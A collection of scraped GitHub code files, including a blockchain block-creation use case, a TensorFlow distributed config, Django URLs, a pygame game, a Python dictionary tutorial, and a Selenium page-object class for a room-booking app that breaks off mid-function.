main()","repo_name":"Ismagold67/systemDeliveryJavaAndPython","sub_path":"miniSystemDeliveryPhyton/sistemaDePedidosDelivery.py","file_name":"sistemaDePedidosDelivery.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"70157245546","text":"from dataclasses import dataclass\nimport datetime\nfrom . import UseCase\nfrom domain.data_repository.blockchain_data_repository import BlockchainDataRepository\nfrom domain.data_repository.mempool_data_repository import MempoolDataRepository\nfrom domain.model.block import Block\n\n\n@dataclass\nclass CreateBlockUCParams:\n proof: str\n previous_hash: str\n\n\nclass CreateBlockUC(UseCase):\n def __init__(self, blockchain_repository: BlockchainDataRepository,\n mempool_data_repository: MempoolDataRepository):\n self.blockchain_repository = blockchain_repository\n self.mempool_data_repository = mempool_data_repository\n\n def execute(self, params: CreateBlockUCParams) -> Block:\n last_index = self.blockchain_repository.get_last_index()\n transactions = self.mempool_data_repository.get_transactions()\n block = Block(index=last_index + 1,\n timestamp=str(datetime.datetime.now()),\n proof=params.proof,\n previous_hash=params.previous_hash,\n transactions=transactions)\n self.blockchain_repository.insert_block(block)\n self.mempool_data_repository.clear_transactions()\n return block\n","repo_name":"gabrielmoreira-dev/blockchain-flask","sub_path":"domain/use_case/create_block_uc.py","file_name":"create_block_uc.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43402177103","text":"'''\nCreated on Aug 27, 2018\n\n@author: Clark\n'''\n\n# ----- Insert that snippet to run distributed jobs -----\n\nimport os\nimport tensorflow as tf\nfrom clusterone import get_data_path, get_logs_path\n\nDATASET_NAME = \"\"\nLOCAL_REPO = \"\"\n\nclass distributed_env():\n '''\n Specifying paths when working locally\n For convenience we use a clusterone wrapper (get_data_path below) to be able\n to switch from local to clusterone without cahnging the code.\n '''\n\n def __init__(self, local_data_path=None,\n cloud_data_path=None,\n logs_path=None,\n local_repo=None,\n cloud_user_repo=None,\n flags=tf.app.flags):\n\n self.data_path = local_data_path\n self.logs_path = logs_path\n self.local_repo = local_repo\n self.cloud_data_path = cloud_data_path\n self.cloud_user_repo = cloud_user_repo\n self.flags = flags\n\n def get_env(self):\n # Configure distributed task\n try:\n job_name = os.environ['JOB_NAME']\n task_index = os.environ['TASK_INDEX']\n ps_hosts = os.environ['PS_HOSTS']\n worker_hosts = os.environ['WORKER_HOSTS']\n except:\n job_name = None\n task_index = 0\n ps_hosts = None\n worker_hosts = None\n\n flags = self.flags\n # Flags for configuring the distributed task\n flags.DEFINE_string(\"job_name\", job_name,\n \"job name: worker or ps\")\n flags.DEFINE_integer(\"task_index\", task_index,\n \"Worker task index, should be >= 0. task_index=0 is \"\n \"the chief worker task that performs the variable \"\n \"initialization and checkpoint handling\")\n flags.DEFINE_string(\"ps_hosts\", ps_hosts,\n \"Comma-separated list of hostname:port pairs\")\n flags.DEFINE_string(\"worker_hosts\", worker_hosts,\n \"Comma-separated list of hostname:port pairs\")\n\n # Training related flags\n flags.DEFINE_string(\"data_dir\",\n get_data_path(\n dataset_name = self.cloud_user_repo, #all mounted repo\n local_root = self.data_path,\n local_repo = self.local_repo,\n path = self.cloud_data_path\n ),\n \"Path to dataset. It is recommended to use get_data_path()\"\n \"to define your data directory.so that you can switch \"\n \"from local to clusterone without changing your code.\"\n \"If you set the data directory manually make sure to use\"\n \"/data/ as root path when running on ClusterOne cloud.\")\n\n flags.DEFINE_string(\"log_dir\",\n get_logs_path(root=self.logs_path),\n \"Path to store logs and checkpoints. It is recommended\"\n \"to use get_logs_path() to define your logs directory.\"\n \"so that you can switch from local to clusterone without\"\n \"changing your code.\"\n \"If you set your logs directory manually make sure\"\n \"to use /logs/ when running on ClusterOne cloud.\")\n\n self.flags = flags\n def device_and_target(self):\n # If FLAGS.job_name is not set, we're running single-machine TensorFlow.\n # Don't set a device.\n flags = self.flags\n if flags.job_name is None:\n print(\"Running single-machine training\")\n return (None, \"\")\n\n # Otherwise we're running distributed TensorFlow\n print(\"Running distributed training\")\n if flags.task_index is None or flags.task_index == \"\":\n raise ValueError(\"Must specify an explicit `task_index`\")\n\n if flags.ps_hosts is None or flags.ps_hosts == \"\":\n raise ValueError(\"Must specify an explicit `ps_hosts`\")\n\n if flags.worker_hosts is None or flags.worker_hosts == \"\":\n raise ValueError(\"Must specify an explicit `worker_hosts`\")\n\n cluster_spec = tf.train.ClusterSpec({\n \"ps\": flags.ps_hosts.split(\",\"),\n \"worker\": flags.worker_hosts.split(\",\"),\n })\n\n server = tf.train.Server(\n cluster_spec, job_name=flags.job_name, task_index=flags.task_index)\n if flags.job_name == \"ps\":\n server.join()\n\n worker_device = \"/job:worker/task:{}\".format(flags.task_index)\n\n # The device setter will automatically place Variables ops on separate\n # parameter servers (ps). The non-Variable ops will be placed on the workers.\n return (\n tf.train.replica_device_setter(\n worker_device=worker_device,\n cluster=cluster_spec),\n server.target,\n )\n\n# --- end of snippet ----\n","repo_name":"Cheng-Lin-Li/show-attend-and-tell","sub_path":"clusterone_config.py","file_name":"clusterone_config.py","file_ext":"py","file_size_in_byte":5106,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"40418380780","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.HomeView.as_view(), name='home'),\n path('listar/', views.PostsListView.as_view(), name='listarposts'),\n path('detalhe//', views.DetalhePostView.as_view(), name='detalhepost'),\n path('enviar//', views.EnviarPostFormView.as_view(), name='enviarpost'),\n path('comentario//', views.ComentarioCreateView.as_view(),\n name='comentpost'),\n path('cadusuario/', views.CadUsuarioView.as_view(), name='cadusuario'),\n path('login/', views.LoginUserView.as_view(), name='loginuser'),\n path('logout/', views.LogoutUserView.as_view(), name='logoutuser'),\n]","repo_name":"marcos-faino/blogifro2023-2","sub_path":"postagens/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"41216552100","text":"from sys import exit\nfrom Player import *\nfrom Vehicle import *\nfrom GameOver import *\nfrom Level import *\nimport pygame\n\n\npygame.init()\nfont = pygame.font.SysFont(\"calibri\", 40)\nkey = pygame.key.get_pressed()\nscreen = pygame.display.set_mode((640,480),0,32)\npygame.display.set_caption(\"JumpGame\")\n\nback = pygame.Surface((640,480))\nbackground = back.convert()\nbackground.fill(Shared.WHITE)\nbackgroundImage = pygame.image.load(os.path.join('Images', 'backgroundImage.png')).convert_alpha()\nclock = pygame.time.Clock()\n\nwhile Shared.inGame:\n Shared.dt = clock.tick(60)\n scoreText = font.render(\"Score : \", True, (Shared.GREEN)) #Display of the score.\n scoreTextLevel = font.render(\"Level : \", True, (Shared.GREEN)) # Display of the score.\n score1 = font.render(str(Shared.score), True, (Shared.GREEN)) #Display of the score.\n score2 = font.render(str(Shared.level), True, (Shared.GREEN)) # Display of the score.\n\n screen.blit(backgroundImage, (0, 0))\n screen.blit(scoreText, (5, 5))\n screen.blit(scoreTextLevel, (5, 50))\n screen.blit(score2, (130, 50))\n screen.blit(score1, (130, 8))\n screen.blit(Shared.car, (Shared.positionCarX, 351))\n screen.blit(Shared.character, (Shared.positionCharacterX, Shared.positionCharacterY))\n\n for event in pygame.event.get():\n if event.type == QUIT:\n exit()\n if event.type == KEYDOWN:\n if event.key == K_SPACE:\n if Shared.positionCharacterY >= 350 and Shared.positionCharacterY < 359:\n CheckLevel()\n Shared.character = pygame.image.load(os.path.join('Images', 'characterJump.png'))\n Shared.moveCharacterY = Shared.speedCharacterY\n if event.key == K_LEFT:\n Shared.moveCharacterX = Shared.speedCharacterX\n if event.key == K_RIGHT:\n Shared.moveCharacterX = -Shared.speedCharacterX\n elif event.type == KEYUP:\n if event.key == K_LEFT:\n Shared.moveCharacterX = 0\n if event.key == K_RIGHT:\n Shared.moveCharacterX = 0\n\n BlockWall()\n Jump()\n AvoidPositionXBug()\n MoveCharacter()\n MoveCar()\n CheckUpCrash()\n SpeedLevel()\n SoundLevel()\n\n if Shared.trafic == \"right\":\n ModelCarRight()\n else:\n ModelCarLeft()\n\n pygame.display.update()\n\n\nif __name__ != '__main__':\n print(\"You must start me as the main module.\")","repo_name":"MaxyArthes/MaxyArthesProg","sub_path":"Pygame/JumpGame/Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":2439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70792540906","text":"import pandas as pd\nimport pickle\nfrom typing import List\nfrom .feature_processor import FeatureProcessor\nfrom matcher.config import RANKED_LIST_PATH\n\n\nclass AggregatedVectorFeatures(FeatureProcessor):\n def __init__(self,feature_names: List[str]):\n super().__init__(feature_names)\n with open(RANKED_LIST_PATH, 'rb') as f:\n self.ranked_list = pickle.load(f)\n\n @property\n def processor_name(self) -> str:\n return \"Aggregated vector features\"\n\n def preprocess(self, df: pd.DataFrame) -> pd.DataFrame:\n df = super().preprocess(df)\n return df\n\n def compute_pair_feature(self, df: pd.DataFrame) -> pd.DataFrame:\n subm=[]\n for i in range(len(df)):\n q=self.ranked_list[df.variantid1[i]]\n try:\n k=(100-q.index(df.variantid2[i]))/100\n except:\n k=0\n subm.append(k) \n \n df[\"vector_pred\"]=subm\n return df\n","repo_name":"EgorSmi/matcher","sub_path":"matcher/features/aggregated_vector_features.py","file_name":"aggregated_vector_features.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25811833947","text":"# Dictionary writen in form of key value pair and \nthisdict =\t{\n \"brand\": \"Ford\",\n \"model\": \"Mustang\",\n \"year\": 1964\n}\nprint(thisdict[\"brand\"])\n\n# it don,t allow duplications if have it will skip it \nthisdicta =\t{\n \"brand\": \"Ford\",\n \"model\": \"Mustang\",\n \"year\": 1964,\n \"year\": 2020\n}\nprint(thisdicta) \n\n# for length of dictionary\nprint(len(thisdicta))\n\n# we can store any data type in it BOOlen Number String \nOnedict =\t{\n \"brand\": \"Ford\",\n \"electric\": False,\n \"year\": 1964,\n \"colors\": [\"red\", \"white\", \"blue\"]\n} \n# we cann access a value by using braket notation[] and key name in it \ngd=Onedict[\"colors\"]\nprint(gd)\n# get() is a method that work in same way work for value \n# for geeting the Keys we have keys()\nsd=Onedict.keys()\nprint(sd)\n# values() return values of Dicatonary\nprint(Onedict.values())\n\n# for updating the value in a Dictonary \ncar = {\n\"brand\": \"Ford\",\n\"model\": \"Mustang\",\n\"year\": 1964\n}\nx = car.values()\nprint(x) #before the change\ncar[\"year\"] = 2020\nprint(x) #after the change\n\n# to itterate all key and Value use item()\nprint(car.items())\n\n# add new key and value in a Dictonary\ncar[\"colors\"]=\"Vanta Black \"\nprint(car)\n\n# to check a item is present in a dict\nif \"colors\" in car:\n print(\"Colors are present in a Dictonary\")\n\n# update() to Update value in a dictonary\ncar.update({\"years\":\"2025\"})\n# print updated value \nprint(car)\n\n# pop() is used to remove item from a Dict by giving a key\ncar.pop(\"model\")\nprint(car)\n\n# popitem() remove last item froma dict and del() and key remove the value froma dict and clear empty the dict \n\n# iterate value from a dict using loop and values() and keys() items()\nfor a in car: \n print(a)\n \n # print all of them\nfor a, b in car.items(): \n print(a, b) \n\n\n# we can copy all items froma dict \nthisdict = {\n \"brand\": \"Ford\",\n \"model\": \"Mustang\",\n \"year\": 1964\n}\nmydict = thisdict.copy()\nprint(mydict)\n\n\n # we can also deeep Nested a Dict \nmyfamily = {\n \"child1\" : {\n \"name\" : \"Emil\",\n \"year\" : 2004\n },\n \"child2\" : {\n \"name\" : \"Tobias\",\n \"year\" : 2007\n },\n \"child3\" : {\n \"name\" : \"Linus\",\n \"year\" : 2011\n }\n} \n\n #it can also be done as for making lifed easy \nchild1 = {\n \"name\" : \"Emil\",\n \"year\" : 2004\n}\nchild2 = {\n \"name\" : \"Tobias\",\n \"year\" : 2007\n}\nchild3 = {\n \"name\" : \"Linus\",\n \"year\" : 2011\n}\n\nmyfamily = {\n \"child1\" : child1,\n \"child2\" : child2,\n \"child3\" : child3\n}\n\nprint(myfamily)\n \n# set value to sa default varible\njj=car.setdefault(\"brand\")\nprint(jj)\n\n\n\n\n\n\n\n\n\n\n","repo_name":"hamza4600/basic-Python","sub_path":"dictonary.py","file_name":"dictonary.py","file_ext":"py","file_size_in_byte":2514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1469709286","text":"import traceback\nfrom Pages.BasePage import BasePage\nfrom WebConfig.web_config import TestData\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.keys import Keys\nfrom time import sleep\n\n\nclass RoomBookingsPage(BasePage):\n\n # <======================================== Selectors ========================================>\n # Body Xpath\n BODY = (By.CSS_SELECTOR, \"body\")\n\n # Room No -------\n ROOM_NO = 124\n ROOM_NUMBER = (\n By.XPATH, \"//*[@id='meeting-room-room-modal-dialog-box']/div/div[2]/div/div/div[1]/div/div[5]/div[3]\")\n # ROOM_AVAIL = (By.XPATH, \"//div[text()='Available']/parent::*/parent::*/following-sibling::*[4]/button\")\n ROOM_AVAIL = \"(//div[text()='Available']/parent::*/parent::*/following-sibling::*[4]/button)\"\n ROOM_AVAIL_NAME = \"(//div[text()='Available']/parent::*/parent::*/following-sibling::*[4]/button)\"\n\n # ---------------\n # BOOKING_NAV = (By.XPATH, \"//h3[text()='Booking']\")\n BOOKING_NAV = (\n By.XPATH, \"//*[@id='navigation']/div/div/div/div[2]/child::*[3]\")\n BOOK_SPACE_NAV = (By.XPATH, \"//*[contains(text(), 'Book space')]\")\n LOCATION_DROPDOWN = (\n By.XPATH, \"//*[@id='meeting-room']/div[2]/div/div[4]/div/div[1]/div/div[1]/div[1]/div/div\")\n GENPACT_IT_PARK = (\n By.XPATH, \"//div[contains(text(), 'Genpact IT Park')]/parent::*/parent::*/parent::*/preceding-sibling::*[2]/span/child::*\")\n BUSINESS_TOWER = (By.XPATH, \"//div[contains(text(), 'Bussiness Tower')]\")\n FREE_CLICK = (\n By.XPATH, \"//*[@id='meeting-room']/div[2]/div/div[4]/div/div[1]/div/div[1]/div[3]/div/div[1]/p\")\n FIRST_FLOOR = (By.ID, \"0-floor\")\n STATUS_DROPDOWN = (\n By.XPATH, \"//*[@id='meeting-room']/div[2]/div/div[4]/div/div[1]/div/div[3]/div[1]/div/div\")\n AVAILABLE_STATUS = (By.CSS_SELECTOR, \"span[title='Available']\")\n BOOKED_STATUS = (By.CSS_SELECTOR, \"span[title='Booked']\")\n ASSIGNED_STATUS = (By.CSS_SELECTOR, \"span[title='Assigned']\")\n INACTIVE_STATUS = (By.CSS_SELECTOR, \"span[title='Inactive']\")\n ALL_STATUS = (By.CSS_SELECTOR, \"span[title='All']\")\n LIST_VIEW_BUTTON = (\n By.XPATH, \"//*[@id='meeting-room']/div[2]/div/div[4]/div/div[1]/div/div[1]/div[3]/div/div[2]/div/div[2]\")\n\n RESOURCE_DROPDOWN = (\n By.XPATH, \"//*[@id='meeting-room']/div[2]/div/div[4]/div/div[1]/div/div[1]/div[3]/div/div[1]/div/div/div\")\n RESOURCE_ROOM = (By.CSS_SELECTOR, \"span[title='Rooms']\")\n # Room\n ROOM_124 = \"//*[@title='{}']/parent::*/parent::*/following-sibling::*[5]/button\"\n\n # Modal selectors\n BOOKING_AGENDA = (\n By.XPATH, \"//*[@id='meeting-room-room-modal-dialog-box']/div/div[2]/div/div/div[2]/div/div[2]/div[2]/input\")\n ATTENDEE_DETAILS = (\n By.XPATH, \"//*[@id='meeting-room-room-modal-dialog-box']/div/div[2]/div/div/div[2]/div/div[4]/div/div[2]/div/div/div[1]\")\n CONFIRM_BOOKING = (\n By.XPATH, \"//*[@id='meeting-room-room-modal-dialog-box']/div/div[2]/div/div/div[2]/div/div[6]/button[2]\")\n EDIT_DETAILS = (\n By.XPATH, \"//*[@id='meeting-room-room-modal-dialog-box']/div/div[2]/div/div/div[1]/div/div[7]/div[2]/p\")\n EDIT_DETAILS_SEARCH_BOX = (\n By.XPATH, \"//*[@id='meeting-room-room-modal-dialog-box']/div/div[2]/div/div/div[1]/div/div[8]/div[1]/div\")\n START_DATE = (\n By.XPATH, \"//*[@id='meeting-room-room-modal-dialog-box']/div/div[2]/div/div/div[1]/div/div[4]/div[1]/div[1]/div[1]/div[2]/div/input\")\n START_DATE_X = (\n By.XPATH, \"//*[@id='meeting-room-room-modal-dialog-box']/div/div[2]/div/div/div[1]/div/div[4]/div[1]/div[1]/div[3]/div[2]/div/span/span\")\n END_DATE = (\n By.XPATH, \"//*[@id='meeting-room-room-modal-dialog-box']/div/div[2]/div/div/div[1]/div/div[4]/div[1]/div[1]/div[3]/div[2]/div/input\")\n CONTACT_EMAIL = (\n By.XPATH, \"//*[contains(text(), 'New Member')]/parent::*/child::*/following-sibling::*/input\")\n CONTACT_RIGHT_TICK = (\n By.XPATH, \"//*[contains(text(), 'New Member')]/parent::*/child::*[4]/div\")\n BOOKING_CONFIRM_BUTTON = (\n By.XPATH, \"//*[contains(text(), 'Confirm Booking')]\")\n LAST_DATE_VALIDITY = (\n By.XPATH, \"//*[@id='meeting-room-room-modal-dialog-box']/div/div[2]/div/div/div[1]/div/div[4]/div[2]/div[2]/div/div[2]/div/div/div/input\")\n\n # BOOKING_MODAL_GO_BACK = (By.XPATH, \"//span[contains(text(),'Go Back')]\")\n BOOKING_MODAL_GO_BACK = (By.XPATH, \"//div/button[1]\")\n # BOOKING_MODAL_GO_BACK = (\n # By.XPATH, \"//*[@id='meeting-room-room-modal-dialog-box']/div/div[1]/div/child::*\")\n\n # After Booking\n ROOM_124_AFTER_BOOKING_TITLE = \"//div[@title='{}']\"\n ROOM_124_RPAGE_STATUS_CHECK = \"//*[@title='{}']/parent::*/parent::td/following-sibling::*[1]/div/div\"\n\n # Resource Details\n RD_CALENDER_INPUT = (\n By.XPATH, \"//*[@id='resource-details-content']/div[1]/div[1]/div/div/div[5]/div/div/div[2]/div[1]/div/div[2]/div/div/input\")\n SCHEDULE_LISTING = (\n By.XPATH, \"//*[@id='resource-details-content']/div[1]/div[1]/div/div/div[5]/div/div/div[3]/div/div/div[2]\")\n I_BUTTON = (By.XPATH, \"//*[@class='rbc-event-content']/span\")\n I_INFO = (By.CLASS_NAME, \"ant-popover-content\")\n I_INFO2 = (By.XPATH, \"/html/body/div[7]/div/div/div\")\n RD_TIME_CHECK = (By.CLASS_NAME, \"rbc-event-label\")\n BOOK_THIS_SPACE = (\n By.XPATH, \"//*[@id='resource-details-content']/div[1]/div[1]/div/div/div[5]/div/div/div[4]/div/button\")\n BOOKING_HOSTNAME = (\n By.XPATH, \"/html/body/div[7]/div/div/div/div[2]/div[2]/div[1]/div[1]\")\n BOOKING_HOSTEMAIL = (\n By.XPATH, \"/html/body/div[7]/div/div/div/div[2]/div[2]/div[1]/div[2]\")\n BOOKING_START = (\n By.XPATH, \"/html/body/div[7]/div/div/div/div[2]/div[2]/div[1]/div[3]\")\n BOOKING_END = (\n By.XPATH, \"/html/body/div[7]/div/div/div/div[2]/div[2]/div[1]/div[4]\")\n\n # My Bookings\n MY_BOOKING_NAV = (By.XPATH, \"//*[@id='sub-nav']/div[2]\")\n ROOM_124_CHECK_DIV = \"(//p[text()='{}']/parent::*/parent::div)\"\n ROOM_124_CHECK_DIV_LAST = \"(//p[text()='{}']/parent::*/parent::div)[last()]\"\n ROOM_124_SCHEDULE_CHECK = \"//p[text()='{}']/parent::*/following-sibling::*[1]\"\n ROOM_124_MEETING_OPTIONS_BUTTONS_CHECK = \"(//p[text()='{}']/parent::*/following-sibling::*[2])\"\n ROOM_124_MEETING_OPTIONS_CANCEL_BUTTON = \"(//p[text()='{}']/parent::*/following-sibling::*[2]/div/div/button[2])\"\n ROOM_124_MEETING_OPTIONS_CANCEL_BUTTON_LAST = \"(//p[text()='{}']/parent::*/following-sibling::*[2]/div/div/button[2])[last()]\"\n ROOM_124_MEETING_OPTIONS_FOLLOWING_CANCEL_BUTTON = \"(//p[text()='{}']/parent::*/following-sibling::*[2]/div/button)\"\n MAIN_CARDS_CONATINER = (By.ID, \"mainBookingCardsContainer\")\n ROOM_124_MEETING_OPTIONS_CANCEL_ALL_DOTS = \"//p[text()='{}']/parent::*/parent::*/preceding-sibling::*/child::*[2]/child::*/child::*/*[@class='MuiSvgIcon-root']\"\n ROOM_124_MEETING_OPTIONS_CANCEL_ALL_BUTTON = (\n By.XPATH, \"//*[text()='Cancel All']\")\n LAST_DATE_INPUT = (\n By.XPATH, \"//*[@id='meeting-room']/div[2]/div/div[4]/div[1]/div/div[1]/div/div/div[2]/div[1]/div/div[3]/input\")\n FREE_CLICK_MB = (\n By.XPATH, \"//*[@id='meeting-room']/div[2]/div/div[4]/div[2]/div[1]/div/div[1]\")\n MAIN_CARDS_CONTAINER = (By.XPATH, \"//*[@id='mainBookingCardsContainer']\")\n REFRESH_BOOKINGS = (By.XPATH, \"//*[@class='ant-tooltip-open']\")\n MY_SHORTCUTS_H3 = (By.XPATH, \"//h3[text()='My Shortcut']\")\n\n # Overlapping error\n GEN_ERROR_MSG = (By.XPATH, \"//*[contains(text(), 'Booking Error:')]\")\n BK_OVERLAPPING_ERROR_MSG = (\n By.XPATH, \"//span[contains(text(), 'Booking Error: Booking Exists')]\")\n BK_OVERLAPPING_ERROR_MSG_1 = (\n By.XPATH, \"//*[contains(text(), 'Error in extending Booking')]\")\n BK_OVERLAPPING_ERROR_MSG_2 = (\n By.XPATH, \"//*[contains(text(), 'Error in extending Booking')]\")\n\n # Recurring\n ROOM_124_CHECK_RDIV = \"(//p[text()='{}']/parent::*/following-sibling::*/div[2]/div/p/span[contains(text(),'every day')])\"\n ROOM_124_RDIV_CANCEL_BUTTON = \"//p[text()='{}']/parent::*/following-sibling::*/div[2]/div/p/span[contains(text(),'every day')]/parent::*/parent::*/parent::*/parent::*/following-sibling::*/div/div/button[2]\"\n REPEAT_DROPDOWN = (\n By.XPATH, \"//*[@id='meeting-room-room-modal-dialog-box']/div/div[2]/div/div/div[1]/div/div[4]/div[2]/div[1]/div/div/div/div[1]\")\n REPEAT_DAILY = (By.XPATH, \"//*[contains(text(), 'Daily')]\")\n REPEAT_WEEKLY = (By.XPATH, \"//*[contains(text(), 'Weekly')]\")\n REPEAT_TILL_DATE = (\n By.XPATH, \"//*[contains(text(), 'Ending (on Date)')]/following-sibling::*/child::*/child::*\")\n REPEAT_FREQUENCY = (By.XPATH, \"//*[contains(text(), 'Every')]/child::*\")\n MULTIPLE_DAYS = (By.XPATH, \"//*[contains(text(), 'Daily')]\")\n MULTIPLE_DAYS_START_DATE = (\n By.XPATH, \"//*[@id='meeting-room']/div[2]/div/div[4]/div/div[1]/div/div[1]/div[2]/div/div/div/div[2]/div/div[1]/input\")\n MULTIPLE_DAYS_END_DATE = (\n By.XPATH, \"//*[@id='meeting-room']/div[2]/div/div[4]/div/div[1]/div/div[1]/div[2]/div/div/div/div[2]/div/div[3]/input\")\n\n # Extend Booking\n PRE_EXTEND_TIME = \"//p[text()='{}']/parent::*/following-sibling::*[1]/div/div\"\n CHECKIN_BOOKING = \"//p[text()='{}']/parent::*/following-sibling::*[2]/div/div/button[1]\"\n EXTEND_BOOKING = \"//p[text()='{}']/parent::*/following-sibling::*[2]/div/div/button[2]\"\n EXTEND_15_MINS = (By.CSS_SELECTOR, \"p[text()='15 minutes']\")\n EXTEND_30_MINS = (By.CSS_SELECTOR, \"p[text()='30 minutes']\")\n EXTEND_45_MINS = (By.CSS_SELECTOR, \"p[text()='45 minutes']\")\n EXTEND_60_MINS = (By.CSS_SELECTOR, \"p[text()='60 minutes']\")\n EXTEND_BOOKING_TEXT_CONFIRM = \"//p[text()='{}']/parent::*/parent::*/following-sibling::div[2]/div\"\n\n # Logout\n LOGOUT_DROPDOWN = (\n By.XPATH, \"//*[@id='navigation']/div/div/div/div[3]/div/div[2]/div/div[2]/div\")\n LOGOUT_BUTTON = (By.XPATH, \"//*[text()='Logout']\")\n\n # Tags\n TAG_DROPDOWN = (\n By.XPATH, \"//*[@id='meeting-room']/div[2]/div/div[4]/div/div[1]/div/div[3]/div[2]/div/div\")\n TAG_SELECT = (\n By.XPATH, f\"//*[@title='{TestData.TAG}']/preceding-sibling::*[1]\")\n\n # Pagination Check\n ROOOMS_CLOSE = (\n By.XPATH, \"//span[@title='Rooms']/child::*[2]/child::*/child::*\")\n TOTAL_ITEMS = (By.XPATH, \"//*[@class='ant-pagination-total-text'][last()]\")\n PAGE_PREV = (\n By.XPATH, \"//*[@class='ant-pagination-total-text']/following-sibling::*[1]\")\n PAGES_NUMBERING = \"//*[@class='ant-pagination-total-text']/following-sibling::*[{}]\"\n FIRST_PAGE_LI = (\n By.XPATH, \"//*[@class='ant-pagination-total-text']/following-sibling::*[2]\")\n NEXT_PREV = (\n By.XPATH, \"//*[@class='ant-pagination-total-text']/following-sibling::*[last()]/*/parent::*/preceding-sibling::*[1]\")\n LAST_PAGE_LI = (\n By.XPATH, \"//*[@class='ant-pagination-total-text']/following-sibling::*[last()]/*/parent::*/preceding-sibling::*[2]\")\n\n NUM_OF_TR = (By.XPATH, \"//tbody/tr\")\n\n VRS_LOADER = (By.XPATH, \"//*[@class='vrs-loader-logo']/child::*\")\n\n\n # Book Space Date Selectors\n BS_DATE_DIV = (By.XPATH, \"//input[@placeholder='Today']\")\n BS_DMULTIPLE_DAYS = (By.XPATH, \"//p[text()='Multiple Days']\")\n BS_DENDDATE = (By.XPATH, \"//input[@placeholder='End date']\")\n BS_DONE = (By.XPATH, \"//button/span[text()='Done']\")\n TDATA_ENDDATE = (By.XPATH, f\"//*[@title='{TestData.BS_CAL_ENDDATE}']\")\n CAL_NEXT_MONTH = (By.CLASS_NAME, \"ant-picker-next-icon\")\n CAL_OK_BUTTON = (By.XPATH, \"//button/span[text()='Ok']\")\n\n # <===================================== Functions =======================================>\n\n \"\"\"constructor of the page class\"\"\"\n\n def __init__(self, driver):\n super().__init__(driver)\n\n \"\"\"Page actions for Bookings Page\"\"\"\n\n \"\"\"selecting location\"\"\"\n\n def select_location(self):\n sleep(5)\n try:\n self.action_chain_click(self.LOCATION_DROPDOWN)\n sleep(2)\n self.action_chain_click(self.GENPACT_IT_PARK)\n sleep(2)\n self.action_chain_click(self.BUSINESS_TOWER)\n sleep(2)\n self.do_click(self.FREE_CLICK)\n assert \"Location selection passed\"\n except Exception as e:\n print(\"Select_location_room exception: \", e)\n # sleep(5)\n\n def select_resource_type(self):\n try:\n self.do_click(self.RESOURCE_DROPDOWN)\n sleep(1)\n self.do_click(self.RESOURCE_ROOM)\n self.do_click(self.FREE_CLICK)\n sleep(1)\n except Exception as e:\n print(\"select_resource_type exception: \", e)\n\n def select_floor(self):\n try:\n self.do_click(self.FIRST_FLOOR)\n sleep(1)\n assert \"Floor selection done\"\n except Exception as e:\n print(\"select_floor exception: \", e)\n\n def select_available_status(self):\n try:\n self.action_chain_click(self.STATUS_DROPDOWN)\n sleep(2)\n self.action_chain_click(self.AVAILABLE_STATUS)\n sleep(2)\n assert \"Select Available status done\"\n except Exception as e:\n print(f\"select_available_status exception: e \\n{traceback.format_exc()}\")\n self.take_screenshot(f\"select_available_status/Ex_{TestData.CDATE[:10]}/{TestData.CDATE[1:]}.png\")\n\n def select_available_resource(self, a=None):\n # self.do_click(self.ROOM_AVAIL)\n for i in range(1, 6):\n title = self.get_element_text_by_xpath(\n self.ROOM_AVAIL_NAME+str([i]))\n if title not in TestData.ROOM_W_ISSUE:\n if a is None:\n print(\"Booking: \", self.ROOM_AVAIL+str([i]))\n self.do_click_by_xpath(self.ROOM_AVAIL+str([i]))\n else:\n self.do_click_by_xpath(self.ROOM_AVAIL_NAME+str([a]))\n break\n else:\n pass\n\n def select_days_end(self):\n try:\n self.do_click(self.BS_DATE_DIV)\n self.action_chain_click(self.BS_DMULTIPLE_DAYS)\n self.action_chain_click(self.BS_DENDDATE)\n print(f\"End date: {self.TDATA_ENDDATE}\")\n for i in range(2):\n d_isvisible = self.is_visible(self.TDATA_ENDDATE)\n print(f\"{i}. visibility: {d_isvisible}\")\n if d_isvisible == True:\n self.do_click(self.TDATA_ENDDATE)\n break\n else:\n self.do_click(self.CAL_NEXT_MONTH)\n self.action_chain_click(self.CAL_OK_BUTTON)\n sleep(1)\n self.action_chain_click(self.BS_DONE)\n sleep(4)\n except Exception as e:\n print(f\"select_days_end exception: {e}\")\n\n def select_tag(self):\n try:\n self.do_click(self.TAG_DROPDOWN)\n sleep(3)\n self.do_click(self.TAG_SELECT)\n sleep(3)\n self.do_click(self.FREE_CLICK)\n sleep(2)\n except Exception as e:\n print(\"select_tag exception: \", e)\n\n def confirm_booking(self):\n self.do_click(RoomBookingsPage.BOOKING_CONFIRM_BUTTON)\n enabled_check = self.is_enabled(\n self.GEN_ERROR_MSG)\n print(\"enabled_check: \", enabled_check)\n if enabled_check == 1:\n error_msg = self.get_element_text(\n self.GEN_ERROR_MSG)\n print(\"error-msg: \", error_msg)\n sleep(6)\n enabled_check_1 = self.is_enabled(\n self.BOOKING_MODAL_GO_BACK)\n print(\"enabled_check1: \", enabled_check_1)\n self.do_click(self.BOOKING_MODAL_GO_BACK)\n sleep(2)\n else:\n pass\n\n def get_room_name(self):\n try:\n rval = self.get_element_text(self.ROOM_NUMBER)\n print(\"rval: \", rval)\n return rval\n except Exception as e:\n print(\"get_room_name exception: \", e)\n\n def select_booked_status(self):\n sleep(3)\n try:\n self.action_chain_click(self.STATUS_DROPDOWN)\n sleep(2)\n 